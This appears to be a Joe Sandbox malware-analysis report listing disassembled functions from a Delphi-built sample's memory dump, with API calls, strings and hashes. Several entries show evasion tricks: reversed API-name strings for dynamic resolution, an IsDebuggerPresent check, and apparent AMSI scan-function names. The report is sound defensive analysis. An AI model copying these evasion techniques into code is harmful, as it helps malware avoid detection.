Opcode ID: fdf0460964f79a6fbb62286b83aa4966f4a8846dfd1239abe6169e0ac9a22371
Instruction ID: 892ae7de714babf15aff1291fe887f9bebb340d3bec682e09465cfa9caa3f7c1
Opcode Fuzzy Hash: fdf0460964f79a6fbb62286b83aa4966f4a8846dfd1239abe6169e0ac9a22371
Instruction Fuzzy Hash: F271D270A042989FDF219B2CCC88BD9BAE5EB49710F1000E5D9C9EB281CB758AC5CF52

Function 02C9BD40 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,02C9C00B,?,?,00000000,00000000), ref: 02C9BD76

Part of subcall function 02C9A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C9A762

Strings

AMPM, xrefs: 02C9BF8A
mmmm d, yyyy, xrefs: 02C9BE72
m/d/yy, xrefs: 02C9BE45
:mm:ss, xrefs: 02C9BFC6
:mm, xrefs: 02C9BFA9
AMPM , xrefs: 02C9BF99

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: 9599c68fd899c5cf9d6dc046492c910fa8e125598cd535d5701f8594b4c0069e
Instruction ID: 45950c4995cd7ab80d0c441c31e9f955fdbe4786d3f0eb5a432c402c428706df
Opcode Fuzzy Hash: 9599c68fd899c5cf9d6dc046492c910fa8e125598cd535d5701f8594b4c0069e
Instruction Fuzzy Hash: DD615174B001489BDF54EBA4DC98BDF77B79F88700F50A436E1019B346DA39DE06ABA4

Function 02CAAE18 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 02CAAE38
GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02CAAE4F
IsBadReadPtr.KERNEL32(?,00000004), ref: 02CAAEE3
IsBadReadPtr.KERNEL32(?,00000002), ref: 02CAAEEF
IsBadReadPtr.KERNEL32(?,00000014), ref: 02CAAF03

Strings

KernelBase, xrefs: 02CAAE4A
LoadLibraryExA, xrefs: 02CAAE45

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: Read$HandleModule
String ID: KernelBase$LoadLibraryExA
API String ID: 2226866862-113032527
Opcode ID: 83051ba82d812e8c7b40ade4eed28de7e19f90f5cf834e6f4677d321d0a7b2c1
Instruction ID: 5e0b627f008f93216cbbc043666869968803f9795b0c39edf33bdc2778b53c5d
Opcode Fuzzy Hash: 83051ba82d812e8c7b40ade4eed28de7e19f90f5cf834e6f4677d321d0a7b2c1
Instruction Fuzzy Hash: F13140B1A40306BBDF60DF69CC95F5A77B8AF0476CF144610EA54DB2C0D771AA50DBA0

Function 02C9432C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02C943F3,?,?,02CF07C8,?,?,02CBD7A8,02C9655D,02CBC30D), ref: 02C94365
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02C943F3,?,?,02CF07C8,?,?,02CBD7A8,02C9655D,02CBC30D), ref: 02C9436B
GetStdHandle.KERNEL32(000000F5,02C943B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02C943F3,?,?,02CF07C8), ref: 02C94380
WriteFile.KERNEL32(00000000,000000F5,02C943B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02C943F3,?,?), ref: 02C94386
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02C943A4

Strings

Error, xrefs: 02C94398
Runtime error at 00000000, xrefs: 02C9435E, 02C9439D

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: a9928c5d60b7892eec3a5e8f2b97af0d20649b69d95b729434621e5633d16ac1
Instruction ID: 2de57c98bd7ac5f2c8d0647bc502d7361b4e3825ebba43acdebc6f562ad38216
Opcode Fuzzy Hash: a9928c5d60b7892eec3a5e8f2b97af0d20649b69d95b729434621e5633d16ac1
Instruction Fuzzy Hash: 27F0F671AD0341B4FE29A6706C4FFA9335C5744F64F180B14B22D680D487E054C1EF12

Function 02C9AE44 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 02C9ACBC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C9ACD9
Part of subcall function 02C9ACBC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02C9ACFD
Part of subcall function 02C9ACBC: GetModuleFileNameA.KERNEL32(02C90000,?,00000105), ref: 02C9AD18
Part of subcall function 02C9ACBC: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02C9ADAE

CharToOemA.USER32(?,?), ref: 02C9AE7B
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02C9AE98
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02C9AE9E
GetStdHandle.KERNEL32(000000F4,02C9AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02C9AEB3
WriteFile.KERNEL32(00000000,000000F4,02C9AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02C9AEB9
LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02C9AEDB
MessageBoxA.USER32(00000000,?,?,00002010), ref: 02C9AEF1

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: d66598b8ef8e6b0b027b7cb3f9b3e7ecffa05411531e798e4064cea9110d558f
Instruction ID: c39b2a6e38a5444aec5092b4f5a8984a84f278155ec672641a12a0632c7e4879
Opcode Fuzzy Hash: d66598b8ef8e6b0b027b7cb3f9b3e7ecffa05411531e798e4064cea9110d558f
Instruction Fuzzy Hash: 841170B2544240BEDE00FB94CC88F9B77EDAB44740F500A2AB754D60D0DA71E9549F66

Function 02C9E50C Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02C9E5A5
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02C9E5C1
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02C9E5FA
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02C9E677
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02C9E690
VariantCopy.OLEAUT32(?,00000000), ref: 02C9E6C5

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction ID: 3be401ada5c206c34abd84e12b84d73d053d5b4d0bf0ac81a82dba84d5da9cb7
Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction Fuzzy Hash: 6251E77690062D9BCF22EF59CD88BD9B3BDAF5D314F0441D6E609A7211DA34AF848F60

Function 02C93568 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02C9358A
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02C935D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02C935BD
RegCloseKey.ADVAPI32(?,02C935E0,00000000,?,00000004,00000000,02C935D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02C935D3

Strings

SOFTWARE\Borland\Delphi\RTL, xrefs: 02C93580
FPUMaskValue, xrefs: 02C935B4

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: 33794ae28a643be02ca1392ac13d5e7de106ff5e5336abbd446a47fd5d9c48fe
Instruction ID: 7e253ad24dc677722c8b8d0cbd34d4344fcdf73983b5238cc3f8db88528e7ec3
Opcode Fuzzy Hash: 33794ae28a643be02ca1392ac13d5e7de106ff5e5336abbd446a47fd5d9c48fe
Instruction Fuzzy Hash: FE01F175A40289BAEF11EB909C06BBD73ECEB08B00F1005A2BA05D3580E7749A10DA98

Function 02CA80C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA8148,?,?,00000000,00000000,?,02CA8061,00000000,KernelBASE,00000000,00000000,02CA8088), ref: 02CA810D
GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA8113
GetProcAddress.KERNEL32(?,?), ref: 02CA8125

Strings

Kernel32, xrefs: 02CA8108
sserddAcorPteG, xrefs: 02CA80DB

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: Kernel32$sserddAcorPteG
API String ID: 667068680-1372893251
Opcode ID: c82c444c1ca47cdda455bc9c61c57fb94aa374fb79b1b67bc6d6a468efe5cc2b
Instruction ID: 8b72442b3d3844d5a2a6f5818f7963bf9940f831899ca3f9f1098bead676208d
Opcode Fuzzy Hash: c82c444c1ca47cdda455bc9c61c57fb94aa374fb79b1b67bc6d6a468efe5cc2b
Instruction Fuzzy Hash: AE01AD74A40308AFEF10EFA4DC55E9E77AEEB49714F524420F608D7A40DA70A905DA20

Function 02C9A9D0 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,02C9AA67,?,?,00000000), ref: 02C9A9E8

Part of subcall function 02C9A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C9A762

GetThreadLocale.KERNEL32(00000000,00000004,00000000,02C9AA67,?,?,00000000), ref: 02C9AA18
EnumCalendarInfoA.KERNEL32(Function_0000A91C,00000000,00000000,00000004), ref: 02C9AA23
GetThreadLocale.KERNEL32(00000000,00000003,00000000,02C9AA67,?,?,00000000), ref: 02C9AA41
EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000003), ref: 02C9AA4C

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: 4c33cf9249ce5c9f690244c2a934722ec86b9c20ceae4d653b2afa0f0617de20
Instruction ID: 07ff756f533817e9174193c4841567e410ff221c87b2a97649d86a49c596241f
Opcode Fuzzy Hash: 4c33cf9249ce5c9f690244c2a934722ec86b9c20ceae4d653b2afa0f0617de20
Instruction Fuzzy Hash: 2101D6716806446FFF11E6748D1AF6E735DDB46B20FA10170F610A6AD0DA74DF00AE64

Function 02C9AA80 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,02C9AC50,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02C9AAAF

Part of subcall function 02C9A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C9A762

Strings

eeee, xrefs: 02C9ABBE
yyyy, xrefs: 02C9ABA5
ggg, xrefs: 02C9AB95

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: f8a5dfe93aa7f229517103551623489b6e2f102af2d992607f998a9021616807
Instruction ID: a9459e11d84744fed064d2d35589e1298a61debf7019756185e38b821fe2427f
Opcode Fuzzy Hash: f8a5dfe93aa7f229517103551623489b6e2f102af2d992607f998a9021616807
Instruction Fuzzy Hash: C74116703089494BDF25EB79888C37EB3EBDB85204B504525D452DB344EB3AEE06DA21

Function 02CA8018 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CA8088,?,?,00000000,?,02CA79FE,ntdll,00000000,00000000,02CA7A43,?,?,00000000), ref: 02CA8056

Part of subcall function 02CA80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA8148,?,?,00000000,00000000,?,02CA8061,00000000,KernelBASE,00000000,00000000,02CA8088), ref: 02CA810D
Part of subcall function 02CA80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA8113
Part of subcall function 02CA80C0: GetProcAddress.KERNEL32(?,?), ref: 02CA8125

GetModuleHandleA.KERNELBASE(?), ref: 02CA806A

Strings

KernelBASE, xrefs: 02CA8051
AeldnaHeludoMteG, xrefs: 02CA8031

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: HandleModule$AddressProc
String ID: AeldnaHeludoMteG$KernelBASE
API String ID: 1883125708-1952140341
Opcode ID: 6ee1ec4628390b9be29e2129ce161fb3446d9b4a5f4a3c34ce3c886e6605b30f
Instruction ID: 7e103eb08a224a20b2150523e0ca8f297f157fbff3d6d17a9e35ec0e064bbcf7
Opcode Fuzzy Hash: 6ee1ec4628390b9be29e2129ce161fb3446d9b4a5f4a3c34ce3c886e6605b30f
Instruction Fuzzy Hash: 2DF0F070644308EFEB50EFB0DC2AE5E77ADFB09B447910A60F508D3A00DA70AD04EAA0

Function 02CAEB8C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KernelBase,?,02CAEF90,UacInitialize,02CF137C,02CBAFD0,UacScan,02CF137C,02CBAFD0,ScanBuffer,02CF137C,02CBAFD0,OpenSession,02CF137C,02CBAFD0,ScanString), ref: 02CAEB92
GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02CAEBA4

Strings

KernelBase, xrefs: 02CAEB8D
IsDebuggerPresent, xrefs: 02CAEB9E

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsDebuggerPresent$KernelBase
API String ID: 1646373207-2367923768
Opcode ID: 799ea5c3c8bffb08f25e8734984a68e43cdddc1380c901dd715c38558b24dbd3
Instruction ID: 6722b1ab3417dd689cce6a3ecb753cbef3d5438ac71a6a6cca1504bf5b4d5889
Opcode Fuzzy Hash: 799ea5c3c8bffb08f25e8734984a68e43cdddc1380c901dd715c38558b24dbd3
Instruction Fuzzy Hash: EAD012B23533211EFA00B6F42CECC2E02CD8A4552E3300EB0B023D20D2E6BA88122699

Function 02C9C3F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,02CBC10B,00000000,02CBC11E), ref: 02C9C3FA
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02C9C40B

Strings

GetDiskFreeSpaceExA, xrefs: 02C9C405
kernel32.dll, xrefs: 02C9C3F5

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 10335bec0a9f7e6c68ee4c4b8a5104c1e7cb62ee698a71f5c3c96accda47ac14
Instruction ID: 89bec6b7566809e1d4a0295b067a0d04c8a03960599726a7777048a913d38518
Opcode Fuzzy Hash: 10335bec0a9f7e6c68ee4c4b8a5104c1e7cb62ee698a71f5c3c96accda47ac14
Instruction Fuzzy Hash: 0FD05EB0B803404AFF01ABB1688D736368C8B4E746F005936E00355102D77286145F90

Function 02C9E168 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02C9E217
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02C9E233
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02C9E2AA
VariantClear.OLEAUT32(?), ref: 02C9E2D3

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction ID: 88cc4affd54d30be4aced111bd87725bc3b5607fc1de9fb5c1d558ec5518bb4c
Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction Fuzzy Hash: C2412B76A006299FCF61EB58CD98BC9B3BDAF59314F0041D6E64DE7211DA34AF809F50

Function 02C9ACBC Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C9ACD9
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02C9ACFD
GetModuleFileNameA.KERNEL32(02C90000,?,00000105), ref: 02C9AD18
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02C9ADAE

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 62d2ef73f87606964b58dbfe123f154125fb526848afc63591d17ccffb05d37b
Instruction ID: 85e9aad571da1bb397f67ff132c378db6f0acab6a50ed8af9eadf056ebc76a63
Opcode Fuzzy Hash: 62d2ef73f87606964b58dbfe123f154125fb526848afc63591d17ccffb05d37b
Instruction Fuzzy Hash: 06414A71A402589BDF21EB68CC88BDAB7FDAB08344F0000E6A548E7241DB759F88DF50

Function 02C9ACBA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C9ACD9
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02C9ACFD
GetModuleFileNameA.KERNEL32(02C90000,?,00000105), ref: 02C9AD18
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02C9ADAE

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 2b2b5aab54b7d4cfe84435e7801245c770962abe327bcdb43e551c8f7e5ad62c
Instruction ID: 4d11beff9598ff9303ac17eb62d5e64bcf16da6ac7391d6eeec9d55c630bfeb5
Opcode Fuzzy Hash: 2b2b5aab54b7d4cfe84435e7801245c770962abe327bcdb43e551c8f7e5ad62c
Instruction Fuzzy Hash: 6B412971A402589BDF61EB68CC88BDAB7FDAB48345F0400E6A648E7241DB759F88DF50

Function 02C91C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

